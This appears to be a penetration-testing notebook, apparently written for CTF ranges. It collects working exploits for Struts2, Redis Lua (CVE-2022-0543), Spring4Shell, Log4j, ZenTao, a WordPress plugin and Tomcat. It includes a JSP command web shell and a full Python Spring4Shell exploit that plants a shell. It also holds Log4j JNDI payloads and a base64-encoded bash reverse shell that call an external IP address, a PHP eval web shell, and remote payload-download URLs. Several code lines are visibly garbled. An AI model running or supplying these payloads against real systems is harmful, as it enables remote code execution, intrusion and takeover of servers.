%java.io.InputStream is Runtime.getRuntime().exec(request.getParameter(cmd)).getInputStream();int a -1;byte[] b new byte[2048];while ((a is.read(b)) ! -1) {out.print(new String(b));}
%>
xxxx?cmd=env
XXE
Login form. CTF XXE - MustaphaMond (cnblogs). Pretty hard!
mysql
WEB
52
cve-2017-5638
struts2-045 remote code execution (CVE-2017-5638)
Upload any file, copy the URL over and scan it directly.
redis-Lua
Chunqiu Cloud: CVE-2022-0543 Redis sandbox escape (CSDN blog)
redis-cli -h xxx -p xxx, payload:
eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 0
eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(env, r); local res f:read(*a); f:close(); return res 0
flink
File upload: jsp
.jar
Exploited with goby.
weblogic
RCE
goby one-shot
SpringFramework
Spring Core is the toolkit in the Spring product family responsible for discovering, creating and managing the relationships between beans; it is the core package containing the basics of the Spring framework, and every other Spring component depends on it.
#!/usr/bin/env python3
#coding:utf-8import requests
import argparse
from urllib.parse import urljoindef Exploit(url):headers {suffix:%//,c1:Runtime,c2:%,DNT:1,Content-Type:application/x-www-form-urlencoded}data class.module.classLoader.resources.context.parent.pipeline.first.pattern%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Diclass.module.classLoader.resources.context.parent.pipeline.first.suffix.jspclass.module.classLoader.resources.context.parent.pipeline.first.directorywebapps/ROOTclass.module.classLoader.resources.context.parent.pipeline.first.prefixtomcatwarclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormattry:go requests.post(url,headersheaders,datadata,timeout15,allow_redirectsFalse, verifyFalse)shellurl urljoin(url, tomcatwar.jsp)shellgo requests.get(shellurl,timeout15,allow_redirectsFalse, verifyFalse)if shellgo.status_code 200:print(f漏洞存在shell地址为:{shellurl}?pwdjcmdwhoami)except Exception as e:print(e)passdef main():parser argparse.ArgumentParser(descriptionSrping-Core Rce.)parser.add_argument(--file,helpurl file,requiredFalse)parser.add_argument(--url,helptarget url,requiredFalse)args parser.parse_args()if args.url:Exploit(args.url)if args.file:with open (args.file) as f:for i in f.readlines():i i.strip()Exploit(i)if __name__ __main__:main() L4
Java version issues; the VPS's own firewall issues.
log4j2-rce-cve-2021-44228 vulnerability reproduction (CSDN blog: log4j2 reproduction, VPS open ports)
i6bfpg.dnslog.cn/solr/admin/cores?action${jndi:ldap://rcilyy.dnslog.cn}
${jndi:ldap://${sys:java.version}.rcilyy.dnslog.cn}http://domain/solr/admin/cores?action${jndi:ldap://${sys:java.version}.u8gtb8.dnslog.cn}${jndi:ldap://x❌x❌1389/Basic/Command/Base64/base64命令}
${jndi:ldap://39.105.154.133:1389/Basic/Command/Base64/bHM}pocldap://null:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supporte实际构造${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}
——————————
java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 39.105.154.133${jndi:ldap://39.105.154.133:1389/Basic/ReverseShell/39.105.154.133/9090}bash -i /dev/tcp/39.105.154.133/9999 01java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85OTk5IDAJjE}|{base64,-d}|{bash,-i} -A 39.105.154.133rmi://39.105.154.133:1099/qxavqn${jndi:rmi://39.105.154.133:1099/2kzlcs}
ZenTao CMS
ZenTao is a Chinese open-source project management tool. Account and password: admin:123456
ZenTao CMS file upload vulnerability (CNVD-C-2020-121325). Preparation:
1. Create shell.php on your own server
with the content <?php phpinfo();?>
2. Put shell.php in a directory the web server can serve.
3. Base64-encode the URL of the malicious file and use the PoC to download it remotely:
http://<range-ip>/zentao/client-download-1
aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA-1.html
Access the shell:
http://<range-ip>/zentao/data/client/1/shell.php, done.
ZenTao 12.4.2 back-end admin Getshell - FreeBuf
Qingdao Easycorp ZenTao CMS command execution vulnerability (CNVD-2020-45147)
12.3.2
[CNVD/CVE] CNVD-C-2020-121325 (CSDN blog)
aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhwzentao/client-download-1-aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw-1.htmlzentao/data/client/1/shell.php?php echo ?php phpinfo();?;
?php echo ?php eval($_POST[2]);?;SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw
http://101.36.125.125:20092/zenteo/www/client-download-1-SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw.html
cve-2019-9978
CVE-2019-9978 WordPress Social Warfare plugin RCE | St1_Fn
Log in, enable the plugin, build the payload:
http://39.105.154.133:9090/test.txt
http://your-targetIP/wp-admin/admin.php?pagesocial-warfareswp_debugload_optionsswp_urlhttp://you-attack-ip/test.txt
http://101.36.125.125:37769/wp-admin/admin.php?pagesocial-warfareswp_debugload_optionsswp_urlhttp://39.105.154.133:9090/test.txt
Tomcat cve-2020-13935 (repeated challenge)
Test PoC:
https://github.com/RedTeamPentesting/CVE-2020-13935
1. $ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
2. $ cd CVE-2020-13935
3. go env -w GOPROXY=https://goproxy.cn
4. $ go build
5. $ ./tcdos ws://<range-ip>/examples/websocket/echoStreamAnnotation